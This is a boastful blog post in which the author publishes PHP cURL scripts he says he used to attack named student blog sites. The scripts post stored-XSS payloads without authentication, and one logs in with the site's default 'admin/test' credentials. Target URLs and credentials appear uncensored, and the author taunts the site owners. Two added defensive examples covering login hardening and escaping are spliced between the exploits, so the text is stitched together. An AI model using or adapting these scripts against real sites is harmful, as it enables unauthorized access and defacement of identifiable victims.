Exploit codes used against Landstede

Hey G33ks,
So, the storm has settled down between the skrubs from Landstede and me.
So I felt it was safe enough to release the exploit codes :)
There were a total of 3 exploits.
All the exploit codes below are 100% how I used them, all URLs, usernames, passwords etc. are 100% uncensored!
Please note that the exploits *should* have been patched (which gives them 0 reason to complain against me for publishing it) since it's about 3-4 months ago at the time of writing.
Well, here you go:



Exploit 1 - April 24 2017


Authentication is a luxury?
<?php
  /*
   * Exploit by FinlayDaG33k
   * https://aberg.newdeveloper.nl/pages/blog.php 
   *
   * "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
   * <Aroop "FinlayDaG33k" Roelofs> wrote this file.
   * As long as you retain this notice you can do whatever you want with this stuff. 
   * If we meet some day, you should buy me a drink.
   * Hugs are mandatory when meeting me!
   * Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
   */

  // Build our message
  $message = urlencode('<h1>Exploited By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1><hr>');
  $message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');

  // Initialize our Curl instance
  $ch = curl_init();

  // Set some options
  curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/blog.php");
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

  // Add our message to the POST body
  curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);

  // Execute the request, then end the script
  curl_exec ($ch);
  curl_close ($ch);
  echo "Exploit sent!";


Exploit 2 - May 1 2017


Using username `admin` and password `test` is generally not a good idea on a website facing the whole world...
<?php
  /*
   * Exploit by FinlayDaG33k
   * https://aberg.newdeveloper.nl/pages/blog.php 
   *
   * "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
   * <Aroop "FinlayDaG33k" Roelofs> wrote this file.
   * As long as you retain this notice you can do whatever you want with this stuff. 
   * If we meet some day, you should buy me a drink.
   * Hugs are mandatory when meeting me!
   * Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
   */ 
  // Build our message
  $message = urlencode('<h1>Blog exploit By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1>');
  $message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');

  // Initialize our Curl request
  $ch = curl_init();

  // Set some options
  curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/admin.php");
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_VERBOSE, true);
  curl_setopt($ch, CURLOPT_TIMEOUT, 10);
  curl_setopt($ch, CURLOPT_HEADER, true);

  // Enable the in-memory cookie engine: an empty string loads no file, but
  // the session cookie admin.php sets is kept and sent on the next request
  curl_setopt($ch, CURLOPT_COOKIEFILE, '');

  // Set the username and password (the site's default credentials)
  curl_setopt($ch, CURLOPT_POSTFIELDS,"user=admin&password=test");

  // Add our headers
  curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Host: aberg.newdeveloper.nl',
    'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0.2) Gecko/20100101 Firefox/6.0.2',
    'Accept: */*',
    'Accept-Language: en-us,en;q=0.5',
    'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7',
    'Connection: keep-alive'
  ));

  // Authenticate ourselves
  $result = curl_exec ($ch);

  // Get our response headers (the Set-Cookie for the session shows up here)
  $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
  $header = substr($result, 0, $header_size);

  // Set a new url option
  curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/blog.php");

  // Post our own message
  curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);
  curl_exec ($ch);

  // Clean up
  curl_close ($ch);
  echo "Exploit sent!";
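What would have stopped Exploit 2 is not the login form but the credentials behind it. As an added example (not code from this post or from the site's own admin.php; the user store, the field names and the default-credential list are made up for the demo), a login routine that refuses known default passwords when an account is created, stores only password_hash() output, verifies against a dummy hash when the user does not exist so timing does not reveal valid usernames, and rotates the session id after a successful login:

```php
<?php
// Added example, not code from the original post or the targeted sites.
// The user table, field names and the default-credential list are assumptions.
declare(strict_types=1);
session_start();

// Username:password pairs that must never be accepted at account creation.
const DEFAULT_CREDENTIALS = [
    'admin:test', 'admin:admin', 'admin:password', 'admin:123456', 'test:test',
];

// Called when an account is created or a password is changed: refuse the obvious.
function password_is_acceptable(string $user, string $password): bool
{
    if (strlen($password) < 12) {
        return false;
    }
    $pair = strtolower($user) . ':' . strtolower($password);
    if (in_array($pair, DEFAULT_CREDENTIALS, true)) {
        return false;
    }
    // Username reused as password is as bad as a default.
    return strcasecmp($user, $password) !== 0;
}

// Constructed user store: only password_hash() output is kept, never the clear text.
function make_user_store(): array
{
    return [
        'admin' => password_hash('correct horse battery staple', PASSWORD_DEFAULT),
    ];
}

// Returns true on success. password_verify() runs whether or not the user
// exists, so a wrong username and a wrong password take the same time.
function login(array $users, string $user, string $password): bool
{
    static $dummy = null;
    if ($dummy === null) {
        $dummy = password_hash(bin2hex(random_bytes(8)), PASSWORD_DEFAULT);
    }
    $hash = $users[$user] ?? $dummy;
    $ok = password_verify($password, $hash) && isset($users[$user]);
    if ($ok) {
        session_regenerate_id(true);   // fresh session id after auth: no fixation
        $_SESSION['user'] = $user;
    }
    return $ok;
}

// Stand-alone demo: the pair Exploit 2 sent, then the real password.
$users = make_user_store();
var_dump(password_is_acceptable('admin', 'test'));
var_dump(login($users, 'admin', 'test'));
var_dump(login($users, 'admin', 'correct horse battery staple'));
```

Brute-force protection (attempt counting per account and per source address) is the piece this demo leaves out; without it an `admin` account with any weak password still falls to a wordlist, just in more requests than the single one Exploit 2 needed.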


Exploit 3 - May 4 2017


This guy trashtalked that I wouldn't be able to exploit his site, well, it worked anyways (hint: he got pissed) :)
<?php
  /*
   * Exploit by FinlayDaG33k
   * https://cschotman.newdeveloper.nl/pages/blog.php 
   *
   * "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
   * <Aroop "FinlayDaG33k" Roelofs> wrote this file.
   * As long as you retain this notice you can do whatever you want with this stuff. 
   * If we meet some day, you should buy me a drink.
   * Hugs are mandatory when meeting me!
   * Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
   */

  // Build our message
  $message = 'This exploit is written on April the 24rd 2017 with ID "FDG-2017-00003".';
  $message .= '<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>';
  
  // Build the POST body. Each field is encoded on its own; urlencode()-ing the
  // whole "a=b&c=d" string at once would turn it into a single key with no value
  $postdata = http_build_query(array(
    'send_post' => 'HUEHUEHUE',
    'new_title' => 'Blog exploit By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a>',
    'new_post'  => $message,
  ));

  // Initialize a new Curl instance
  $ch = curl_init();

  // Set some options
  curl_setopt($ch, CURLOPT_URL,"https://cschotman.newdeveloper.nl/blog/new_post.php");
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

  // Add our POST data
  curl_setopt($ch, CURLOPT_POSTFIELDS,$postdata);

  // Send the request
  // Then close our handler
  $result = curl_exec($ch);
  curl_close ($ch);

  // Dump the result
  print_r($result);  


Exploit 5 - May 4 2017 (same as Exploit #1, but against a different target)


How was this one even possible?
I already exploited a site using the same mistake...
This one got them really mad btw :mrgreen:
<?php
  /*
   * Exploit by FinlayDaG33k
   * https://pmetz.newdeveloper.nl/pages/blog.php 
   *
   * "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
   * <Aroop "FinlayDaG33k" Roelofs> wrote this file.
   * As long as you retain this notice you can do whatever you want with this stuff. 
   * If we meet some day, you should buy me a drink.
   * Hugs are mandatory when meeting me!
   * Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
   */

  // Build our message
  $message = urlencode('<h1>Exploited By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1><hr>');
  $message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');

  // Initialize a Curl instance
  $ch = curl_init();

  // Set some options (no trailing whitespace in the URL, or the request goes nowhere)
  curl_setopt($ch, CURLOPT_URL,"https://pmetz.newdeveloper.nl/pages/blog.php");
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

  // Add our message
  curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);

  // Execute the request, then clean up
  curl_exec ($ch);
  curl_close ($ch);
  echo "Exploit sent!";
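Exploits 1, 3 and 5 all hit the same mistake: a POST handler that stores whatever arrives in `item` (or `new_post`) without checking for a login, and later echoes it unescaped. As an added example (not code from this post or from the Landstede sites, whose source is not shown here), a blog.php handler in the shape those requests imply: first the assumed vulnerable version, then the same handler hardened with a session check, a CSRF token and output escaping:

```php
<?php
// Added example, not code from the original post or the targeted sites.
// The "vulnerable" handler is an assumption reconstructed from the request
// the exploits send (POST item=...), since the real source is not on the page.
declare(strict_types=1);
session_start();

// --- Assumed vulnerable shape: every POST with "item" is stored, then echoed raw ---
function vulnerable_handle(array $post, array &$store): void
{
    if (isset($post['item'])) {
        $store[] = $post['item'];   // no login check at all
    }
    foreach ($store as $item) {
        echo $item;                 // raw echo: stored XSS
    }
}

// --- Hardened version ---
function csrf_token(): string
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}

function hardened_handle(array $post, array &$store): void
{
    if (isset($post['item'])) {
        // 1. Only a logged-in user may create posts.
        if (empty($_SESSION['user'])) {
            http_response_code(403);
            exit('login required');
        }
        // 2. The request must carry this session's CSRF token (constant-time compare),
        //    so a logged-in editor cannot be made to post by a cross-site form.
        if (!isset($post['csrf']) || !hash_equals(csrf_token(), (string) $post['csrf'])) {
            http_response_code(403);
            exit('bad csrf token');
        }
        // 3. Bound the input and store the raw text; escaping happens at output.
        $item = (string) $post['item'];
        if (strlen($item) > 10000) {
            http_response_code(413);
            exit('too long');
        }
        $store[] = $item;
    }
    foreach ($store as $item) {
        // HTML-escape at the output boundary: the exploit's <script> renders as text.
        echo '<p>' . htmlspecialchars($item, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
    }
}

// Stand-alone demo with a constructed payload (the one Exploit 1 sends),
// as a logged-in user carrying a valid token, so the post is accepted but escaped.
$store = [];
$_SESSION['user'] = 'editor';
$payload = [
    'item' => '<script>alert("Exploited by FinlayDaG33k");</script>',
    'csrf' => csrf_token(),
];
hardened_handle($payload, $store);
```

The two fixes are independent: the login check alone still leaves stored XSS for anyone who can log in (Exploit 2 shows how cheap that is with default credentials), and escaping alone still lets anonymous visitors post. A Content-Security-Policy header on top limits the damage if an escape is missed somewhere else in the site.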


Well, there ya have it :)
If they dare to open their mouths against me again, then we can be sure that they don't give a damn about security.
But for now...
[g33kout]
